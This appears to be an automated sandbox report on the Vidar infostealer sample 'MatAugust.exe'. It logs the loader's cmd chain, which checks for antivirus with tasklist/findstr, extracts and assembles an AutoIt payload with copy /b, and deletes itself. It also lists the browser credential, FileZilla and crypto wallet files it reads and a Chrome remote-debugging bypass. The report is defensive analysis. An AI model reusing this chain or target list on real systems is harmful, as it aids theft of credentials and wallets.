Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: MatAugust.exe

Static file information: File size 1171058 > 1048576

Source: MatAugust.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: MatAugust.exe

Static PE information: real checksum: 0x11ca3d should be: 0x124aa4

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Jump to dropped file

Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 8116

Thread sleep count: 86 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe, 00000011.00000002.2065334999.0000250C00B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: chrome.exe, 00000011.00000002.2067204677.0000250C01048000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=8d36de56-798b-4d80-880d-2b7f949bc77e
Source: chrome.exe, 00000011.00000002.2051841721.0000028198B78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 164676	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Grab	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "slovenia" Contractors	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com Stopped.com h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\wlxlf" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: Stopped.com, 0000000C.00000000.1705486292.00000000007E3000.00000002.00000001.01000000.00000007.sdmp, Stopped.com.1.dr, Born.8.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	111 Masquerading	2 OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	11 Input Capture	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	12 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	3 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	15 System Information Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
